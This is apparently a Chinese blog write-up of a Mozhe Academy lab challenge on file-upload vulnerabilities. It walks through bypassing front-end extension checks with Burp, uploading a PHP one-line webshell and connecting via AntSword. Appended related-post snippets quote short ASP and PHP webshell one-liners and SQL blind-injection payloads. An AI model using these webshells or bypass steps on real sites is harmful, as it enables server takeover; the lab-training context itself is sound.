【墨者学院】WebShell文件上传漏洞分析溯源(第2题)

已于 2023-08-01 14:59:42 修改
阅读量1.1k 收藏 3
点赞数 1
文章标签: 安全
于 2022-11-28 12:14:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66835614/article/details/128076261
版权

靶场:墨者学院

题目:WebShell文件上传漏洞分析溯源(第2题)

1、打开是一个文件上传的提交框,正常上传一个txt文件看下返回结果。

 2.看情况是限制了文件上传的后缀名,显示只能上传以下格式的文件:  .gif  .jpg  .png。

3.上传一张正常的png格式的图片,通过bp抓包查看请求和响应包,包头信息可以看到是php语言开发的网站。

4.回顾题目的解题思路,禁用JavaScript,绕过文件上传的限制,以及通过webshell连接服务器。 

了解到JavaScript是前端web脚本语言,猜测是前端做了限制,要绕过前端验证。

5.百度搜索php一句话木马的代码,将代码贴出来,另存为jpg格式。

6.重新上传该文件,打开bp开启抓包,抓到包后修改文件的后缀为php格式,然后bp放包,返回页面结果。

 

7.页面显示路径,成功上传了,然后通过蚁剑连接上去。(也可使用其他工具连接,菜刀,冰蝎等)将返回的路径附带上,测试连接。

 8.添加数据后双击进入服务器后台,一层目录一层目录返回查看,找到key。(解题完成)

总结:

1.此题考点为绕过前端验证,验证的是文件的后缀名。

2.可以通过禁用JavaScript的方式,也可以通过抓包改包的方式上传webshell文件。

替补选手
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件上传漏洞-02】前端限制与绕过靶场实战
cc
02-14 5345
由于JS限制,它的运行环境是我们本地浏览器,只要能看得懂JS代码,就可以进行修改JS代码甚至是删除表单事件来做绕过。由于JS限制,它的运行环境是我们本地浏览器,只要能看得懂JS代码,就可以进行修改JS代码甚至是删除表单事件来做绕过。
墨者学院-SQL注入漏洞测试(布尔盲注)
weixin_42939822的博客
03-20 4284
决心按部就班、由浅入深地去剖析下sql注入目提供的靶场环境,完善自身解思路。本靶场环境比较简单、也比较常见,没有设置严格的过滤规则,仅仅是限制了页面的回显功能,属于比较初级的sql注入目。废话不多说啦,先附上目链接:https://www.mozhe.cn/bug/detail/UDNpU0gwcUhXTUFvQm9HRVdOTmNTdz09bW96aGUmozhe*
墨者——WebShell文件上传漏洞分析溯源(第2)
qq_43793775的博客
09-25 299
背景介绍 安全工程师"墨者"在单位办公内网做日常检测时,发现某部门为了方便内部人员上传聚餐的活动图片,在某服务器上新增一简单的图片上传功能。然而这个存在一个很严重的高危漏洞 实训目的 1、掌握浏览器对JavaScript的禁用方法; 2、掌握表单数据通过POST提交数据时,对数据的修改方法; 3、了解WebShell是什么及其作用; 4、了解JavaScript基本语法; 5、了解JavaScri...
第4篇:jsp型webshell被删情况下如何溯源攻击时间
ABC_123的博客
04-17 449
Part1前言在日常的蓝队溯源工作、感染加密勒索病毒后的应急排查工作中,查找攻击者遗留的webshell是一种常规手段,一旦webshell文件被找到后,可以反推出很多信息,最重要的是能确定攻击者攻击时间,以此攻击时间为轴心开展溯源工作会事半功倍。但攻击者经常会把webshell文件删除,并且清理掉所有的访问日志,这种情况下应该怎么溯源确定上传webshell的攻击时间呢.........
墨者学院(POST注入)
2301_77578012的博客
05-19 396
使用burpsuite抓包放在1.txt文件中,并且1.txt放在sqlmap工具。发现存在注入点,并且给出了我们具体执行的payload格式。(如果大家对工具有需求的话可以q我哈)参数后所跟数据也可以通过抓包获取。1.墨者靶场(POST注入)2.sqlmap工具(主要)3.burpsuite工具。,在需要测试参数后加。
墨者学院--SQL注入实战(防注入)-Access(菜刀连接超时问)
weixin_43071873的博客
09-20 888
进入靶场,测试一下,输入and 1=1 ,提示操作被记录 数据被直接保存在数据库,可以考虑直接把一句话木马传上去 直接传,发现一句话木马没被传上去, 将木马进行url编码一下传入。 使用御剑查找后台。 上菜刀 PS:这个靶场有点奇怪,插入一句话木马后,用菜刀可能超时连不上,重置缓存也不行,遇到这种情况,可以尝试换个浏览器,换一个新的菜刀,或者换个工具,冰歇啊,蚁剑都可以。也可以参照其他博主在插入一句话时用 and 1=<%eval request(“a”)%>,具体为什么出现这个问
墨者学院WebShell文件上传分析溯源(第2)
yoyoko_chan的博客
07-23 282
0x00  偶然看到这道,学习一下文件上传的新姿势。 0x01  打开靶机,没啥提示,那就先用御剑扫一扫后台  发现 /admin/upload1.php /admin/upload2.php  访问/admin/upload1.php后发现显示权限不够,并直接跳到了/admin/upload2.php  抓包查看upload1.php的相应包,发现该弹窗是由JS代码控制的,浏览器设置禁用JS后再次访问  主菜来了,直接上传菜刀,上传成功后用蚁剑试连接,出现异常  猜测是由于网站后台对上传的文件
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1)、PHP代码分析溯源(第2)、PHP逻辑漏洞利用实战(第1)、SQL手工注入漏洞测试(Access数据库)
墨者安全专家第二代 彻底免疫未知病毒
11-02
墨者安全专家第二代为您彻底免疫未知病毒,并且提供终身免费国际杀毒品牌趋势科技的优质产品! 墨者安全专家第二代是融合了反rootkit技术、用户权限管理技术和白名单技术并有机集成的免疫“革离”技术。同时第二代集...
免费墨者安全专家第二代 V3.7.0.4 正式版(无功能限制)
11-01
墨者安全专家第二代为您彻底免疫未知病毒,并且提供终身免费国际杀毒品牌趋势科技的优质产品! 墨者安全专家第二代是融合了反rootkit技术、用户权限管理技术和白名单技术并有机集成的免疫“革离”技术。同时第二代集...
spring IOC实现(墨者革离)
12-12
该代码主要用于spring IOC的实现(墨者革离),模拟一个城门叩问的编剧场景
Web安全--文件上传漏洞
bobo_milk的博客
11-11 1089
本文参考了一些文章,如有侵权请留言删除。该文章基于upload-labs基础靶场进行编写。
墨者学院-编辑器漏洞分析溯源(第2)
臭nana的博客
12-19 503
win10系统打开有问,看下面评论所以我用了win2003 详情可见:https://blog.csdn.net/u011781521/article/details/59057759 找到ewebeditor默认后台:http://219.153.49.228:43621/admin_login.asp 下载默认数据库文件,路径为:db/ewebeditor.mdb 使用工具打开文件 m...
墨者学院 - WebShell文件上传漏洞分析溯源(第5)
多崎巡礼的博客
08-14 1714
弱口令 admin admin 进入后台 添加文章-上传asp一句话木马的图片马,记住返回的路径 当前数据库路径更改为上传一句话木马后返回的路径 备份数据库名称填写后缀为asp的文件名 菜刀链接即可   不能理解为什么数据库名是路径到文件,按理说应该是一个只到文件夹的路径才对。。。 言而总之,就是备份数据可以将文件重命名          ...
墨者学院 电子数据取证
zip471642048的博客
05-29 1841
文章目录电子数据取证-流量分析(第1)网络数据分析溯源(攻击者IP) 电子数据取证-流量分析(第1) 网络数据分析溯源(攻击者IP) 查看z1的内容,可以知道z5是执行sql的命令
墨者学院 - WebShell代码分析溯源(第2)
多崎巡礼的博客
07-31 742
&lt;?php  $POST['POST']='assert'; $array[]=$POST; $array[0]['POST']($_POST['assert']) ;?&gt; assert,是php代码执行函数,与eval()有同样的功能,assert()函数中参数为表达式 (或者为函数) 因为$array[], POST[]都是数组,所以$array[]=$POST,就是...
墨者学院-CMS系统漏洞分析溯源(第3)
ploto_cs的博客
10-09 531
一.漏洞描述 在用户注册或者修改个人资料中,我们可以注入一句话到数据库中,拿到shell 二.影响版本 新云CMS 4.0.0 SP1 三.漏洞复现 1.使用御剑对域名进行探测 登录网址为http://219.153.49.228/login.asp 2.注册用户 在“密码问”插入一句话木马 一句话木马为: <% execute request(“a”)%>” 经过Erlang 中文简体字 GB2312 转 unicode 转换来的 ┼攠數畣整爠煥敵瑳∨≡┩愾 3.检查木马是否上传成功
墨者学院 - WebShell代码分析溯源(第5)
多崎巡礼的博客
08-02 807
  一个个看,,,找到该文件,经典的回调函数形式 菜刀连接, ip/www/Exception.php?POST=assert 密码为assert 得到key 关于回调函数可参考此文章 https://blog.csdn.net/qq_24196029/article/details/78118680     &lt;?php error_reporting(0); call...
墨者靶场sql布尔盲注
10-09
针对墨者靶场的 SQL 布尔盲注,你需要先了解 SQL 注入的基本概念和实现方式。在进行布尔盲注时,需要通过构造特定的 SQL 语句来判断数据库中是否存在某些数据或条件,从而实现注入攻击。以下是一些可能用到的注入语句: 1. 判断存在性:SELECT * FROM table WHERE column = 'value' and 1=1(存在)或 1=2(不存在) 2. 判断字段长度:SELECT * FROM table WHERE LENGTH(column) = n and 1=1(长度为 n)或 1=2(长度不为 n) 3. 判断字符内容:SELECT * FROM table WHERE ASCII(SUBSTRING(column, n, 1)) = c and 1=1(第 n 个字符的 ASCII 码为 c)或 1=2(第 n 个字符的 ASCII 码不为 c) 在使用布尔盲注时,需要不断地尝试不同的语句,并根据返回结果进行判断和推断。同时,需要注意防止误伤和误判,以免造成不必要的影响和损失。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值